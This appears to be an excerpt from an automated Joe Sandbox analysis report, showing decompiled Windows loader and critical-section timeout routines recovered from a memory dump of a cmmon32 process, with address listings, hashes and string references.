				intOrPtr* _t137;
				signed char* _t139;
				intOrPtr* _t143;
				intOrPtr _t144;
				intOrPtr _t146;
				intOrPtr _t152;
				intOrPtr* _t154;
				intOrPtr* _t156;
				intOrPtr _t163;
				intOrPtr* _t166;
				intOrPtr _t168;
				intOrPtr _t170;
				void* _t181;

				_t166 = __ecx;
				if(( *(__ecx + 0x34) & 0x00000040) != 0) {
					L8:
					return _t90;
				} else {
					_t91 =  *(__ecx + 0x90);
					if(_t91 == 0) {
						_t91 = E0458699E(__ecx + 0x2c);
						 *(__ecx + 0x90) = _t91;
					}
					_t143 = _t166 + 0x3c;
					_t93 = 0x4667a00 + (_t91 & 0x0000001f) * 8;
					_t156 =  *((intOrPtr*)(_t93 + 4));
					if( *_t156 != _t93) {
						L13:
						_t144 = 3;
						asm("int 0x29");
						_t94 = _t144;
						_t137 = _t156;
						_push(_t166);
						_v16 = _t94;
						_t168 =  *((intOrPtr*)(_t94 + 0x20));
						_t163 = 0;
						_v24 = _t137;
						if(E0458CEE4( *((intOrPtr*)(_t168 + 0x18)), 1, 0xe,  &_v28,  &_v12) >= 0) {
							_t146 = _v8;
						} else {
							_t146 = 0;
							_v8 = 0;
						}
						if(_t146 != 0) {
							if(( *(_v12 + 0x10) & 0x00800000) != 0) {
								_t163 = 0xc000007b;
							} else {
								_t101 =  *(_t168 + 0x34) | 0x00400000;
								 *(_t168 + 0x34) = _t101;
								if(( *(_t146 + 0x10) & 0x00000001) == 0) {
									goto L17;
								} else {
									 *(_t168 + 0x34) = _t101 | 0x01000000;
									_t163 = E0457C9A4( *((intOrPtr*)(_t168 + 0x18)));
									if(_t163 >= 0) {
										goto L17;
									}
								}
							}
						} else {
							L17:
							if(( *(_t137 + 0x16) & 0x00002000) == 0) {
								 *(_t168 + 0x34) =  *(_t168 + 0x34) & 0xfffffffb;
							} else {
								if(( *( *((intOrPtr*)(_t168 + 0x5c)) + 0x10) & 0x00000080) != 0) {
									if(( *(_t137 + 0x5e) & 0x00000080) != 0) {
										goto L19;
									} else {
										_t130 =  *0x4665780; // 0x0
										if((_t130 & 0x00000003) != 0) {
											E045F5510("minkernel\\ntdll\\ldrmap.c", 0x363, "LdrpCompleteMapModule", 0, "Could not validate the crypto signature for DLL %wZ\n", _t168 + 0x24);
											_t130 =  *0x4665780; // 0x0
										}
										if((_t130 & 0x00000010) != 0) {
											asm("int3");
										}
										_t163 = 0xc0000428;
									}
								} else {
									L19:
									if(( *(_t168 + 0x34) & 0x01000000) == 0) {
										_t105 = _a4 - 0x40000003;
										if(_t105 == 0 || _t105 == 0x33) {
											_v16 =  *((intOrPtr*)(_t168 + 0x18));
											if(E04597D50() != 0) {
												_t110 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
											} else {
												_t110 = 0x7ffe0384;
											}
											_t139 = 0x7ffe0385;
											if( *_t110 != 0) {
												if(( *( *[fs:0x30] + 0x240) & 0x00000004) != 0) {
													if(E04597D50() == 0) {
														_t125 = 0x7ffe0385;
													} else {
														_t125 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
													}
													if(( *_t125 & 0x00000020) != 0) {
														E045F7016(0x1490, _v16, 0xffffffff, 0xffffffff, 0, 0);
													}
												}
											}
											if(_a4 != 0x40000003) {
												L28:
												_t170 =  *((intOrPtr*)(_t168 + 0x18));
												if(E04597D50() != 0) {
													_t115 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
												} else {
													_t115 = 0x7ffe0384;
												}
												if( *_t115 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000004) != 0) {
													if(E04597D50() != 0) {
														_t139 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
													}
													if(( *_t139 & 0x00000020) != 0) {
														E045F7016(0x1491, _t170, 0xffffffff, 0xffffffff, 0, 0);
													}
												}
											} else {
												_v16 = _t168 + 0x24;
												_t163 = E045AA1C3( *((intOrPtr*)(_t168 + 0x18)),  *((intOrPtr*)(_v12 + 0x5c)), _v20, _t168 + 0x24);
												if(_t163 < 0) {
													E0457B1E1(_t163, 0x1490, 0, _v16);
												} else {
													goto L28;
												}
											}
										}
									}
								}
							}
						}
						return _t163;
					} else {
						 *_t143 = _t93;
						 *((intOrPtr*)(_t143 + 4)) = _t156;
						 *_t156 = _t143;
						 *((intOrPtr*)(_t93 + 4)) = _t143;
						_t181 = _t166 -  *0x4667984; // 0x612ac8
						if(_t181 == 0) {
							_t152 =  *0x4667bac; // 0x612ac8
							if( *((intOrPtr*)(_t152 + 4)) != 0x4667bac) {
								goto L13;
							} else {
								 *_t166 = _t152;
								 *((intOrPtr*)(_t166 + 4)) = 0x4667bac;
								_t90 = _t166 + 8;
								 *((intOrPtr*)(_t152 + 4)) = _t166;
								_t156 =  *0x4667bb4;
								 *0x4667bac = _t166;
								if( *((intOrPtr*)(_t156 + 4)) != 0x4667bb4) {
									goto L13;
								} else {
									 *_t90 = _t156;
									 *((intOrPtr*)(_t90 + 4)) = 0x4667bb4;
									 *((intOrPtr*)(_t156 + 4)) = _t90;
									 *0x4667bb4 = _t90;
									goto L7;
								}
							}
						} else {
							_t154 =  *0x4667bb0; // 0x6196e0
							if( *_t154 != 0x4667bac) {
								goto L13;
							} else {
								 *_t166 = 0x4667bac;
								_t90 = _t166 + 8;
								 *((intOrPtr*)(_t166 + 4)) = _t154;
								 *_t154 = _t166;
								_t156 =  *0x4667bb8; // 0x6196e8
								 *0x4667bb0 = _t166;
								if( *_t156 != 0x4667bb4) {
									goto L13;
								} else {
									 *_t90 = 0x4667bb4;
									 *((intOrPtr*)(_t90 + 4)) = _t156;
									 *_t156 = _t90;
									 *0x4667bb8 = _t90;
									L7:
									 *(_t166 + 0x34) =  *(_t166 + 0x34) | 0x00000040;
									goto L8;
								}
							}
						}
					}
				}
			}
































                                                                                                                0x04587d75
                                                                                                                0x04587d7b
                                                                                                                0x04587def
                                                                                                                0x04587df0
                                                                                                                0x04587d7d
                                                                                                                0x04587d7d
                                                                                                                0x04587d85
                                                                                                                0x04587df4
                                                                                                                0x04587df9
                                                                                                                0x04587df9
                                                                                                                0x04587d8a
                                                                                                                0x04587d8d
                                                                                                                0x04587d94
                                                                                                                0x04587d99
                                                                                                                0x04587e3c
                                                                                                                0x04587e3e
                                                                                                                0x04587e3f
                                                                                                                0x04587e4a
                                                                                                                0x04587e4c
                                                                                                                0x04587e4e
                                                                                                                0x04587e50
                                                                                                                0x04587e55
                                                                                                                0x04587e58
                                                                                                                0x04587e5d
                                                                                                                0x04587e71
                                                                                                                0x04587f33
                                                                                                                0x04587e77
                                                                                                                0x04587e77
                                                                                                                0x04587e79
                                                                                                                0x04587e79
                                                                                                                0x04587e7e
                                                                                                                0x04587f45
                                                                                                                0x045d9848
                                                                                                                0x04587f4b
                                                                                                                0x04587f4e
                                                                                                                0x04587f53
                                                                                                                0x04587f5a
                                                                                                                0x00000000
                                                                                                                0x04587f60
                                                                                                                0x045d985a
                                                                                                                0x045d9862
                                                                                                                0x045d9866
                                                                                                                0x00000000
                                                                                                                0x045d986c
                                                                                                                0x045d9866
                                                                                                                0x04587f5a
                                                                                                                0x04587e84
                                                                                                                0x04587e84
                                                                                                                0x04587e8d
                                                                                                                0x045d9871
                                                                                                                0x04587e93
                                                                                                                0x04587e9a
                                                                                                                0x045d987e
                                                                                                                0x00000000
                                                                                                                0x045d9884
                                                                                                                0x045d9884
                                                                                                                0x045d988b
                                                                                                                0x045d98a7
                                                                                                                0x045d98ac
                                                                                                                0x045d98b1
                                                                                                                0x045d98b6
                                                                                                                0x045d98b8
                                                                                                                0x045d98b8
                                                                                                                0x045d98b9
                                                                                                                0x045d98b9
                                                                                                                0x04587ea0
                                                                                                                0x04587ea0
                                                                                                                0x04587ea7
                                                                                                                0x04587eac
                                                                                                                0x04587eb1
                                                                                                                0x04587ec6
                                                                                                                0x04587ed0
                                                                                                                0x045d98cc
                                                                                                                0x04587ed6
                                                                                                                0x04587ed6
                                                                                                                0x04587ed6
                                                                                                                0x04587ede
                                                                                                                0x04587ee3
                                                                                                                0x045d98e3
                                                                                                                0x045d98f0
                                                                                                                0x045d9902
                                                                                                                0x045d98f2
                                                                                                                0x045d98fb
                                                                                                                0x045d98fb
                                                                                                                0x045d9907
                                                                                                                0x045d991d
                                                                                                                0x045d991d
                                                                                                                0x045d9907
                                                                                                                0x045d98e3
                                                                                                                0x04587ef0
                                                                                                                0x04587f14
                                                                                                                0x04587f14
                                                                                                                0x04587f1e
                                                                                                                0x045d9946
                                                                                                                0x04587f24
                                                                                                                0x04587f24
                                                                                                                0x04587f24
                                                                                                                0x04587f2c
                                                                                                                0x045d996a
                                                                                                                0x045d9975
                                                                                                                0x045d9975
                                                                                                                0x045d997e
                                                                                                                0x045d9993
                                                                                                                0x045d9993
                                                                                                                0x045d997e
                                                                                                                0x04587ef2
                                                                                                                0x04587efc
                                                                                                                0x04587f0a
                                                                                                                0x04587f0e
                                                                                                                0x045d9933
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x04587f0e
                                                                                                                0x04587ef0
                                                                                                                0x04587eb1
                                                                                                                0x04587ea7
                                                                                                                0x04587e9a
                                                                                                                0x04587e8d
                                                                                                                0x04587ec0
                                                                                                                0x04587d9f
                                                                                                                0x04587d9f
                                                                                                                0x04587da1
                                                                                                                0x04587da4
                                                                                                                0x04587da6
                                                                                                                0x04587dae
                                                                                                                0x04587db4
                                                                                                                0x04587e01
                                                                                                                0x04587e0a
                                                                                                                0x00000000
                                                                                                                0x04587e0c
                                                                                                                0x04587e0c
                                                                                                                0x04587e0e
                                                                                                                0x04587e11
                                                                                                                0x04587e14
                                                                                                                0x04587e1c
                                                                                                                0x04587e22
                                                                                                                0x04587e2b
                                                                                                                0x00000000
                                                                                                                0x04587e2d
                                                                                                                0x04587e2d
                                                                                                                0x04587e2f
                                                                                                                0x04587e32
                                                                                                                0x04587e35
                                                                                                                0x00000000
                                                                                                                0x04587e35
                                                                                                                0x04587e2b
                                                                                                                0x04587db6
                                                                                                                0x04587db6
                                                                                                                0x04587dbe
                                                                                                                0x00000000
                                                                                                                0x04587dc0
                                                                                                                0x04587dc0
                                                                                                                0x04587dc2
                                                                                                                0x04587dc5
                                                                                                                0x04587dc8
                                                                                                                0x04587dcf
                                                                                                                0x04587dd5
                                                                                                                0x04587ddd
                                                                                                                0x00000000
                                                                                                                0x04587ddf
                                                                                                                0x04587ddf
                                                                                                                0x04587de1
                                                                                                                0x04587de4
                                                                                                                0x04587de6
                                                                                                                0x04587deb
                                                                                                                0x04587deb
                                                                                                                0x00000000
                                                                                                                0x04587deb
                                                                                                                0x04587ddd
                                                                                                                0x04587dbe
                                                                                                                0x04587db4
                                                                                                                0x04587d99

                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000009.00000002.477383270.0000000004550000.00000040.00000001.sdmp, Offset: 04550000, based on PE: true
                                                                                                                • Associated: 00000009.00000002.477926408.000000000466B000.00000040.00000001.sdmp Download File
                                                                                                                • Associated: 00000009.00000002.477934562.000000000466F000.00000040.00000001.sdmp Download File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_9_2_4550000_cmmon32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 07e6e7ba91a68f7d85310571d767bac93f9a9a7d837cee247f70c1d7fbc8bc4a
                                                                                                                • Instruction ID: b23d0243dcfc9161962cecd17e8136f51ebcb6aa7bc7d867cf2b4e97f0a85430
                                                                                                                • Opcode Fuzzy Hash: 07e6e7ba91a68f7d85310571d767bac93f9a9a7d837cee247f70c1d7fbc8bc4a
                                                                                                                • Instruction Fuzzy Hash: 1A21F6B0502702CFC725DF24E540552BBE8FB49709B2595AED48A9B751EB30F842CF94
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 0460FDDA, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 42COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 53%
                                                                                                                			E0460FDDA(intOrPtr* __edx, intOrPtr _a4) {
				void* _t7;
				intOrPtr _t9;
				intOrPtr _t10;
				intOrPtr* _t12;
				intOrPtr* _t13;
				intOrPtr _t14;
				intOrPtr* _t15;

				_t13 = __edx;
				_push(_a4);
				_t14 =  *[fs:0x18];
				_t15 = _t12;
				_t7 = E045BCE00( *__edx,  *((intOrPtr*)(__edx + 4)), 0xff676980, 0xffffffff);
				_push(_t13);
				E04605720(0x65, 1, "RTL: Enter CriticalSection Timeout (%I64u secs) %d\n", _t7);
				_t9 =  *_t15;
				if(_t9 == 0xffffffff) {
					_t10 = 0;
				} else {
					_t10 =  *((intOrPtr*)(_t9 + 0x14));
				}
				_push(_t10);
				_push(_t15);
				_push( *((intOrPtr*)(_t15 + 0xc)));
				_push( *((intOrPtr*)(_t14 + 0x24)));
				return E04605720(0x65, 0, "RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u\n",  *((intOrPtr*)(_t14 + 0x20)));
			}










                                                                                                                0x0460fdda
                                                                                                                0x0460fde2
                                                                                                                0x0460fde5
                                                                                                                0x0460fdec
                                                                                                                0x0460fdfa
                                                                                                                0x0460fdff
                                                                                                                0x0460fe0a
                                                                                                                0x0460fe0f
                                                                                                                0x0460fe17
                                                                                                                0x0460fe1e
                                                                                                                0x0460fe19
                                                                                                                0x0460fe19
                                                                                                                0x0460fe19
                                                                                                                0x0460fe20
                                                                                                                0x0460fe21
                                                                                                                0x0460fe22
                                                                                                                0x0460fe25
                                                                                                                0x0460fe40

                                                                                                                APIs
                                                                                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0460FDFA
                                                                                                                Strings
                                                                                                                • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 0460FE01
                                                                                                                • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 0460FE2B
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000009.00000002.477383270.0000000004550000.00000040.00000001.sdmp, Offset: 04550000, based on PE: true
                                                                                                                • Associated: 00000009.00000002.477926408.000000000466B000.00000040.00000001.sdmp Download File
                                                                                                                • Associated: 00000009.00000002.477934562.000000000466F000.00000040.00000001.sdmp Download File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_9_2_4550000_cmmon32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                                                                • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u
                                                                                                                • API String ID: 885266447-3903918235
                                                                                                                • Opcode ID: 228c1f6c84291129605cbde09808ae3ddbd68abdf9c94290dafcc4798ebb2164
                                                                                                                • Instruction ID: 509f9258ec2813d9f5331c1b1c303777cd70a20c148df4b84d78332f6d47aa85
                                                                                                                • Opcode Fuzzy Hash: 228c1f6c84291129605cbde09808ae3ddbd68abdf9c94290dafcc4798ebb2164
                                                                                                                • Instruction Fuzzy Hash: AFF0F632200201BFE6291A45DC06F23BB5AEB44730F144318F628561E1EAA2FC20EAF8
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%